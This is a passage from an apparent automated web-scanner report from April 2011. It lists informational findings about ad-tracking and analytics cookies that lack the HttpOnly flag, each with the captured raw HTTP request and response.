Cookie: ID=AAAAAQAU6fB5bLIqJTbWvlzW3Ft0OcZJYxcAANGoPMSHa0D5h6539_dUjA0AAAEvZiIaJw--; LO=AAAAAQAUYn__ZmG8acLIZhvDLvm3d2V86m4BAHVzYTt2dDs1MjM7c3Rvd2U7MDU2NzI7c29mdGxheWVyIHRlY2hub2xvZ2llcyBpbmMuO2Jyb2FkYmFuZDsxNzMuMTkzLjIxNC4yNDM-; UA=AAAAAQAUDl0S8xnL7FEJVbNsodwmXFAeDNADA3gBY2BgEGFg6lzCwJLdwsDI.5OB4YYbAwMDJwMDo34vh0s_LrmO7JhTOOWS3K7jlIvwuoZTzm9CCE451wYOqFwb0J3fge50gbmzQ8L9Nk59EnbauPS1n9y5CZe.9pMzanHKnRBejFPu2IJHOOWOfhXEKTdjATtuOdtWnHLTH3rilutYiVvOVBen3LSbijjlKst8geHOiFu.Wwgoz.C7ZWcDAwcwIe1kZGRkYAi8xcgMpBgMmBiEQXwFM7Dw0gKwMEsmIxtQkCWEiY2RHciQ38XEwA1SBk2DIAMZADWIkL4-

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: UA=AAAAAQAUxOdW3WQldyr.xNlqt1dY_m2yKF0DA3gBY2BgEGFg6lzCwJLdysDI.4OB4YYrAwMDJwMDo34vxzZvqFwLUO4nUM4NIefSj0uuIzvmFE65JLfrOOUivK7hlPObEIJTzrWBAyrXBnTnd6A7XWDu7JBwv41Tn4SdNi597Sd3bsKlr_3kjFqccieEF.OUO7bgEU65o18FccrNWMCOW862Fafc9IeeuOU6VuKWM9XFKTftpiIwbBlxyld2CwHlGXy37Gxg4AAmpJ2MjIwMDIG3GJmBFIMBE4MIiK9gBhZeWgAWZslkZAMKsoQwsTGyAxnyu5gYuEHKwGnQB2QeAwMAUdqQwA--; Domain=.amgdgt.com; Expires=Wed, 25-May-2011 14:20:49 GMT; Path=/
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Cache-Control: no-cache, no-store
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/javascript;charset=UTF-8
Content-Length: 3919
Date: Mon, 25 Apr 2011 14:20:48 GMT

_289669_amg_acamp_id=166308;
_289669_amg_pcamp_id=69112;
_289669_amg_location_id=55365;
_289669_amg_creative_id=289669;
_289669_amg_loaded=true;
var _amg_289669_content='<script type="text/javascript"
...[SNIP]...
17.64. http://ad.trafficmp.com/a/bpix  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.trafficmp.com
Path:   /a/bpix

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /a/bpix?adv=652&id=1005&r= HTTP/1.1
Host: ad.trafficmp.com
Proxy-Connection: keep-alive
Referer: http://pixel.fetchback.com/serve/fb/pdc?cat=&name=landing&sid=719
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid2=470fb0bcf-3fea-4322-beeb-57f5828c5936-gmr873a3; T_6sn9=dlx%3A6ot5%3A1; rth=2-ljzkpb-dlx~6ot5~1~1-7p9~0~1~1-

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: image/gif
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Date: Mon, 25 Apr 2011 15:14:01 GMT
Connection: close
Set-Cookie: T_6sn9=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_4uej=eo7%3A86y3%3A1; Domain=trafficmp.com; Expires=Tue, 24-Apr-2012 15:14:02 GMT; Path=/
Set-Cookie: rth=2-ljzkpb-eo7~86y3~1~1-dlx~6ot5~1~1-7p9~0~1~1-; Domain=trafficmp.com; Expires=Tue, 24-Apr-2012 15:14:02 GMT; Path=/
Content-Length: 43

GIF89a.............!.......,...........D..;
17.65. http://ad.trafficmp.com/a/bpix  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.trafficmp.com
Path:   /a/bpix

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /a/bpix?adv=652&id=1005&r= HTTP/1.1
Host: ad.trafficmp.com
Proxy-Connection: keep-alive
Referer: http://pixel.fetchback.com/serve/fb/pdc?cat=&name=landing&sid=719
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid2=470fb0bcf-3fea-4322-beeb-57f5828c5936-gmr873a3; T_6t2z=eo7%3A85fc%3A1; rth=2-ljzkpb-eo7~85fc~1~1-dlx~6ot5~1~1-7p9~0~1~1-

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: image/gif
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Date: Mon, 25 Apr 2011 15:21:08 GMT
Connection: close
Set-Cookie: T_6t2z=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_4ptz=eo7%3A879x%3A1; Domain=trafficmp.com; Expires=Tue, 24-Apr-2012 15:21:08 GMT; Path=/
Set-Cookie: rth=2-ljzkpb-eo7~879x~1~1-dlx~6ot5~1~1-7p9~0~1~1-; Domain=trafficmp.com; Expires=Tue, 24-Apr-2012 15:21:08 GMT; Path=/
Content-Length: 43

GIF89a.............!.......,...........D..;
17.66. http://ad.trafficmp.com/a/bpix  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.trafficmp.com
Path:   /a/bpix

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /a/bpix?adv=652&id=1005&r= HTTP/1.1
Host: ad.trafficmp.com
Proxy-Connection: keep-alive
Referer: http://pixel.fetchback.com/serve/fb/pdc?cat=&name=landing&sid=719
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid2=470fb0bcf-3fea-4322-beeb-57f5828c5936-gmr873a3; T_9xbg=eo7%3A85ej%3A1; rth=2-ljzkpb-eo7~85ej~1~1-dlx~6ot5~1~1-7p9~0~1~1-

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: image/gif
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Date: Mon, 25 Apr 2011 15:14:11 GMT
Connection: close
Set-Cookie: T_9xbg=""; Domain=trafficmp.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: T_3evi=eo7%3A86yc%3A1; Domain=trafficmp.com; Expires=Tue, 24-Apr-2012 15:14:11 GMT; Path=/
Set-Cookie: rth=2-ljzkpb-eo7~86yc~1~1-dlx~6ot5~1~1-7p9~0~1~1-; Domain=trafficmp.com; Expires=Tue, 24-Apr-2012 15:14:11 GMT; Path=/
Content-Length: 43

GIF89a.............!.......,...........D..;
17.67. http://ad.yieldmanager.com/pixel  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /pixel

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /pixel?id=1160808&id=736181&id=961753&id=688926&id=1160806&id=1057233&id=1127643&id=1206656&t=2 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
Referer: http://goods.adnectar.com/static/quantcast_1.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=uid=888a2c66-6932-11e0-8830-001b24783b20&_hmacv=1&_salt=4113190855&_keyid=k1&_hmac=2bd08a6ff17f1fdebe5379daa4d53c1f64bef7b8; pv1="b!!!!$!#M*E!,Y+@!$Xwq!/h[p!%:3<!!!!$!?5%!(/4f4!w1K*!%4fo!'i8L!'>d6~~~~~<vl)[<wjgu~!#3yC!,Y+@!$Xwq!1`)_!%bq`!!!!$!?5%!$U=A2!w1K*!%4fo!$k7.!'pCX~~~~~<wYiT=#mS_~"; lifb=o1s9XS8(?nv?!8H; ih="b!!!!2!)Tt+!!!!#<wYoD!)`Tm!!!!#<vmX7!)`Tq!!!!#<vmX5!)`U6!!!!#<vmX0!*loT!!!!#<vl)_!/Iw4!!!!#<wF]1!/_KY!!!!#<vl)T!/h[p!!!!#<vl)[!/iq6!!!!$<vmX=!/iq@!!!!$<vm`!!/iqB!!!!#<vmTN!/iqH!!!!#<vmTH!1EYJ!!!!#<wUv<!1M!9!!!!$<wF]9!1`)_!!!!#<wYiT"; bh="b!!!#,!!!?H!!!!%<wR0_!!-G2!!!!$<w[UB!!-yu!!!!.<vm`$!!.+B!!!!.<vm`%!!1Mv!!!!#<waw+!!2(j!!!!/<whqI!!4Qs!!!!%<wle3!!J<=!!!!)<wYiT!!J<E!!!!)<wYiT!!LHY!!!!.<whoV!!L[f!!!!#<wYl+!!ONX!!!!#<wle$!!ObA!!!!$<wav`!!VQ(!!!!#<wYkr!!ita!!!!*<wYiT!!q:E!!!!'<wYiT!!q<+!!!!(<wYiT!!q</!!!!(<wYiT!!q<3!!!!(<wYiT!##^t!!!!#<wYoF!#+<r!!!!#<wO:5!#-H0!!!!#<wleD!#.dO!!!!$<w[_`!#2YX!!!!#<vl)_!#3g6!!!!#<w>/l!#5[N!!!!#<vl)_!#8Mo!!!!#<wle%!#L]q!!!!#<w>/s!#MHv!!!!$<w>/n!#MTK!!!!#<w>/m!#Mr7!!!!#<w>/l!#Qh8!!!!#<w,W$!#RY.!!!!$<w[_`!#SCj!!!!$<w[_`!#SCk!!!!$<w[_`!#SEm!!!!)<wYiT!#SF3!!!!)<wYiT!#UDP!!!!)<wYiT!#U_(!!!!*<wleI!#VEP!!!!#<wleE!#[L>!!!!%<w[UA!#]%`!!!!#<w<@B!#]@s!!!!%<whqH!#]W%!!!!$<w[_`!#^Bo!!!!$<w[_`!#^d6!!!!#<w<@B!#`S2!!!!$<wav`!#a'?!!!!#<w>/m!#aCq!!!!(<w[U@!#aG>!!!!$<w[_`!#aH.!!!!#<w<=N!#b.n!!!!#<w<=N!#c-u!!!!-<w*F]!#e9?!!!!#<wAwk!#eaO!!!!$<w[_`!#g[h!!!!$<w[_`!#mP5!!!!$<w[UB!#mP6!!!!$<w[UB!#p6E!!!!%<wleK!#p6Z!!!!#<wle8!#q),!!!!#<wO:5!#q2T!!!!.<whoV!#q2U!!!!.<whoV!#q9]!!!!#<waw+!#qx3!!!!#<wGkF!#qx4!!!!#<wGk*!#r:A!!!!#<waw,!#uJY!!!!)<wYiT!#ust!!!!$<w[_`!#usu!!!!$<w[_`!#wGj!!!!#<wle$!#wGm!!!!#<wle$!#wW9!!!!$<w[_`!#xI*!!!!$<w[_`!#xIF!!!!%<wYiT!#yM#!!!!$<w[_`!#yX.!!!!9<w*F[!$!>x!!!!*<wjBg!$#WA!!!!$<w[_`!$$K<!!!!$<wleJ!$$L.!!!!#<w[Sh!$$L/!!!!#<w[Sh!$$L0!!!!#<w[Sh!$$LE!!!!#<w[_a!$$LL!!!!$<w[_f!$$p*!!!!#<wUv4!$%,!!!!!$<w[_`!$%SB!!!!$<w[_`!$%Uy!!!!#<w>/l!$%gR!!!!#<w,SV!$(!P!!!!#<wav`!$(+N!!!!#<wGkB!$(Gt!!!!%<wYiT!$(Qs!!!!$<w[_`"; BX=8khj7j56qmjsh&b=4&s=dk&t=106

Response

HTTP/1.1 302 Found
Date: Mon, 25 Apr 2011 14:34:54 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: bh="b!!!#4!!!?H!!!!%<wR0_!!-G2!!!!$<w[UB!!-yu!!!!.<vm`$!!.+B!!!!.<vm`%!!1Mv!!!!#<waw+!!2(j!!!!/<whqI!!4Qs!!!!%<wle3!!J<=!!!!)<wYiT!!J<E!!!!)<wYiT!!LHY!!!!.<whoV!!L[f!!!!#<wYl+!!ONX!!!!#<wle$!!ObA!!!!$<wav`!!VQ(!!!!#<wYkr!!ita!!!!*<wYiT!!q:E!!!!'<wYiT!!q<+!!!!(<wYiT!!q</!!!!(<wYiT!!q<3!!!!(<wYiT!##^t!!!!#<wYoF!#+<r!!!!#<wO:5!#-B#!!!!#<wsc<!#-H0!!!!#<wleD!#.dO!!!!$<w[_`!#2YX!!!!#<vl)_!#3g6!!!!#<w>/l!#3pv!!!!#<wsc<!#5[N!!!!#<vl)_!#8Mo!!!!#<wle%!#L]q!!!!#<w>/s!#MHv!!!!$<w>/n!#MTK!!!!#<w>/m!#Mr7!!!!#<w>/l!#Qh8!!!!#<w,W$!#RY.!!!!$<w[_`!#SCj!!!!$<w[_`!#SCk!!!!$<w[_`!#SEm!!!!)<wYiT!#SF3!!!!)<wYiT!#T,d!!!!#<wsc<!#UDP!!!!)<wYiT!#U_(!!!!*<wleI!#VEP!!!!#<wleE!#[L>!!!!%<w[UA!#]%`!!!!#<w<@B!#]@s!!!!%<whqH!#]W%!!!!$<w[_`!#^Bo!!!!$<w[_`!#^d6!!!!#<w<@B!#`S2!!!!$<wav`!#a'?!!!!#<w>/m!#aCq!!!!(<w[U@!#aG>!!!!$<w[_`!#aH.!!!!#<w<=N!#b.n!!!!#<w<=N!#b@%!!!!#<wsc<!#c-u!!!!-<w*F]!#e9?!!!!#<wAwk!#eaO!!!!$<w[_`!#g[h!!!!$<w[_`!#l)E!!!!#<wsc<!#mP5!!!!$<w[UB!#mP6!!!!$<w[UB!#p6E!!!!%<wleK!#p6Z!!!!#<wle8!#p]R!!!!#<wsc<!#p]T!!!!#<wsc<!#q),!!!!#<wO:5!#q2T!!!!.<whoV!#q2U!!!!.<whoV!#q9]!!!!#<waw+!#qx3!!!!#<wGkF!#qx4!!!!#<wGk*!#r:A!!!!#<waw,!#uJY!!!!)<wYiT!#ust!!!!$<w[_`!#usu!!!!$<w[_`!#w!v!!!!#<wsc<!#wGj!!!!#<wle$!#wGm!!!!#<wle$!#wW9!!!!$<w[_`!#xI*!!!!$<w[_`!#xIF!!!!%<wYiT!#yM#!!!!$<w[_`!#yX.!!!!9<w*F[!$!>x!!!!*<wjBg!$#WA!!!!$<w[_`!$$K<!!!!$<wleJ!$$L.!!!!#<w[Sh!$$L/!!!!#<w[Sh!$$L0!!!!#<w[Sh!$$LE!!!!#<w[_a!$$LL!!!!$<w[_f!$$p*!!!!#<wUv4!$%,!!!!!$<w[_`!$%SB!!!!$<w[_`!$%Uy!!!!#<w>/l!$%gR!!!!#<w,SV!$(!P!!!!#<wav`!$(+N!!!!#<wGkB!$(Gt!!!!%<wYiT!$(Qs!!!!$<w[_`"; path=/; expires=Wed, 24-Apr-2013 14:34:54 GMT
Set-Cookie: BX=8khj7j56qmjsh&b=4&s=dk&t=106; path=/; expires=Tue, 19-Jan-2038 03:14:07 GMT
Location: http://www.googleadservices.com/pagead/conversion/1034849195/?label=2fvbCJuz5gEQq5e67QM&amp;guid=ON&amp;script=0
Cache-Control: no-store
Last-Modified: Mon, 25 Apr 2011 14:34:54 GMT
Pragma: no-cache
Content-Length: 0
Age: 0
Proxy-Connection: close

17.68. http://an.yandex.ru/code/47934  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://an.yandex.ru
Path:   /code/47934

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /code/47934?rnd=33486&direct-limit=9&charset=utf-8&block-origin=2&page-ref=&target-ref=http%3A%2F%2Fwww.trucklist.ru%2Fcars%2Ftrucks%3Futm_source%3Dy_direct%26utm_medium%3Dcpc%26utm_campaign%3Dtruck%26_openstat%3DZGlyZWN0LnlhbmRleC5ydTsxNzg5NDA3OzUzNzQ4MDA7eWFuZGV4LnJ1Omd1YXJhbnRlZQ&grab=dNCh0YDQtdC00L3QuNC1INC4INGC0Y_QttC10LvRi9C1INCz0YDRg9C30L7QstC40LrQuCDQsiDRgNC10LPQuNC-0L3QtSDQktGB0Y8g0KDQvtGB0YHQuNGPIC0g0L7QsdGK0Y_QstC70LXQvdC40Y8g0L3QsCBUcnVja2xpc3QucnUKMdCe0LHRitGP0LLQu9C10L3QuNGPIMK7wqAg0KHRgNC10LTQvdC40LUg0Lgg0YLRj9C20LXQu9GL0LUg0LPRgNGD0LfQvtCy0LjQutC4IAoyCjPQn9GA0LXQvNC40YPQvC3QvtCx0YrRj9Cy0LvQtdC90LjRjyA= HTTP/1.1
Host: an.yandex.ru
Proxy-Connection: keep-alive
Referer: http://www.trucklist.ru/cars/trucks?utm_source=y_direct&utm_medium=cpc&utm_campaign=truck&_openstat=ZGlyZWN0LnlhbmRleC5ydTsxNzg5NDA3OzUzNzQ4MDA7eWFuZGV4LnJ1Omd1YXJhbnRlZQ
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: yandexuid=1981869761303741204; yabs-uvf=0000000000000000

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 14:43:31 GMT
Server: Phantom/0.0.0
P3P: CP="NOI DEVa TAIa OUR BUS UNI STA"
Last-Modified: Mon, 25 Apr 2011 14:43:31 GMT
Expires: Mon, 25 Apr 2011 14:43:31 GMT
Cache-Control: private, no-cache, no-store, must-revalidate, max-age=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Set-Cookie: yabs-uvf=00000FxPbsm00000; domain=an.yandex.ru; path=/; expires=Mon, 02-May-2011 14:43:31 GMT
Content-Length: 6232

var y5_sLinkHead = 'http://an.yandex.ru/count/Jd4i95txsC440000ZhE9MDi4XPwp2vQlAn7HaRXs6q01arIam00000m8VWC0';
var y5_iDirectCounter = 0;
var y5_iDirectAdsCounter = 0;

function yandex_direct_print() {

...[SNIP]...
17.69. http://an.yandex.ru/code/57617  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://an.yandex.ru
Path:   /code/57617

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /code/57617?rnd=29605&direct-limit=9&charset=utf-8&block-origin=2&page-ref=&target-ref=http%3A%2F%2Fwebalta.ru%2Fnews.html&grab=dNCSINCw0LzQtdGA0LjQutCw0L3RgdC60L7QuSDQs9C70YPQsdC40L3QutC1INC90LDRiNC70Lgg0YDQtdC00YfQsNC50YjRg9GOINC40L3QutGD0L3QsNCx0YPQu9GD HTTP/1.1
Host: an.yandex.ru
Proxy-Connection: keep-alive
Referer: http://webalta.ru/news.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: yandexuid=1981869761303741204

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 14:20:09 GMT
Server: Phantom/0.0.0
P3P: CP="NOI DEVa TAIa OUR BUS UNI STA"
Last-Modified: Mon, 25 Apr 2011 14:20:09 GMT
Expires: Mon, 25 Apr 2011 14:20:09 GMT
Cache-Control: private, no-cache, no-store, must-revalidate, max-age=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Set-Cookie: yabs-uvf=0000000000000000; domain=an.yandex.ru; path=/; expires=Mon, 02-May-2011 14:20:09 GMT
Content-Length: 6626

var y5_sLinkHead = 'http://an.yandex.ru/count/J9i6sP-l6Xu40000ZhanMDi4XP4H3fQl8qgkaQbw69MJLAJE000030Xz0m00';
var y5_iDirectCounter = 0;
var y5_iDirectAdsCounter = 0;

function yandex_direct_print() {

...[SNIP]...
17.70. http://an.yandex.ru/code/66894  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://an.yandex.ru
Path:   /code/66894

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /code/66894?rnd=928638&direct-limit=9&charset=utf-8&block-origin=2&page-ref=&target-ref=http%3A%2F%2Fpogoda.webalta.ru%2F&grab=dNCf0L7Qs9C-0LTQsCDQvdCwIHdlYmFsdGEucnU= HTTP/1.1
Host: an.yandex.ru
Proxy-Connection: keep-alive
Referer: http://pogoda.webalta.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: yandexuid=1981869761303741204; yabs-uvf=0000000000000000

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 14:20:30 GMT
Server: Phantom/0.0.0
P3P: CP="NOI DEVa TAIa OUR BUS UNI STA"
Last-Modified: Mon, 25 Apr 2011 14:20:30 GMT
Expires: Mon, 25 Apr 2011 14:20:30 GMT
Cache-Control: private, no-cache, no-store, must-revalidate, max-age=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Set-Cookie: yabs-uvf=0000000000000000; domain=an.yandex.ru; path=/; expires=Mon, 02-May-2011 14:20:30 GMT
Content-Length: 3561

var y5_sLinkHead = 'http://an.yandex.ru/count/1QrEGmZSpqW40000ZhuoMDi4XPvK49Qke0McaRm8UAa3arIapW0000m8VWC0';
var y5_iDirectCounter = 0;
var y5_iDirectAdsCounter = 0;

function yandex_direct_print() {

...[SNIP]...
17.71. http://ar.voicefive.com/b/wc_beacon.pli  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /b/wc_beacon.pli

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/wc_beacon.pli?n=BMX_G&d=0&v=method-%3E-1,ts-%3E1303741228.986,wait-%3E10000,&1303741240885 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-1134822682510879&output=html&h=600&slotname=3061072279&w=160&lmt=1303759227&flash=10.2.154&url=http%3A%2F%2Fgames.webalta.ru%2F&dt=1303741227549&bpp=5&shv=r20110420&jsv=r20110415&correlator=1303741227571&frm=0&adk=1110337129&ga_vid=973557293.1303741228&ga_sid=1303741228&ga_hid=154889240&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1125&bih=929&fu=0&ifi=1&dtd=35&xpc=naYdoqC7iz&p=http%3A//games.webalta.ru
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&; ar_p90175839=exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&; ar_p81479006=exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&; ar_s_p81479006=1; ar_p97174789=exp=22&initExp=Sun Apr 24 12:09:48 2011&recExp=Mon Apr 25 14:20:21 2011&prad=253732016&arc=181106347&; BMX_G=method->-1,ts->1303741221; BMX_3PC=1; UID=875e3f1e-184.84.247.65-1303349046

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 25 Apr 2011 14:24:25 GMT
Content-Type: image/gif
Connection: close
Vary: Accept-Encoding
Set-Cookie: BMX_G=method%2D%3E%2D1%2Cts%2D%3E1303741228%2E986%2Cwait%2D%3E10000%2C; path=/; domain=.voicefive.com;
Content-length: 42
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent

GIF89a.............!.......,........@..D.;
17.72. http://ar.voicefive.com/bmx3/broker.pli  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /bmx3/broker.pli?pid=p97174789&PRAd=253732016&AR_C=181106347 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-1134822682510879&output=html&h=600&slotname=3061072279&w=160&lmt=1303759227&flash=10.2.154&url=http%3A%2F%2Fgames.webalta.ru%2F&dt=1303741227549&bpp=5&shv=r20110420&jsv=r20110415&correlator=1303741227571&frm=0&adk=1110337129&ga_vid=973557293.1303741228&ga_sid=1303741228&ga_hid=154889240&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1125&bih=929&fu=0&ifi=1&dtd=35&xpc=naYdoqC7iz&p=http%3A//games.webalta.ru
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&; ar_p90175839=exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&; ar_p97174789=exp=21&initExp=Sun Apr 24 12:09:48 2011&recExp=Sun Apr 24 16:50:29 2011&prad=253732016&arc=186884742&; ar_p81479006=exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&; ar_s_p81479006=1; UID=875e3f1e-184.84.247.65-1303349046

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 25 Apr 2011 14:23:23 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p97174789=exp=22&initExp=Sun Apr 24 12:09:48 2011&recExp=Mon Apr 25 14:23:23 2011&prad=253732016&arc=181106347&; expires=Sun 24-Jul-2011 14:23:23 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_G=method->-1,ts->1303741403; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 25091

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"253732016",Pid:"p97174789",Arc:"181106347",Location:
...[SNIP]...
17.73. http://b.dclick.ru/image.ng/site=mail.ru&adsize=1x1&pos=all.07041160&transactionID=842057554  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.dclick.ru
Path:   /image.ng/site=mail.ru&adsize=1x1&pos=all.07041160&transactionID=842057554

Issue detail

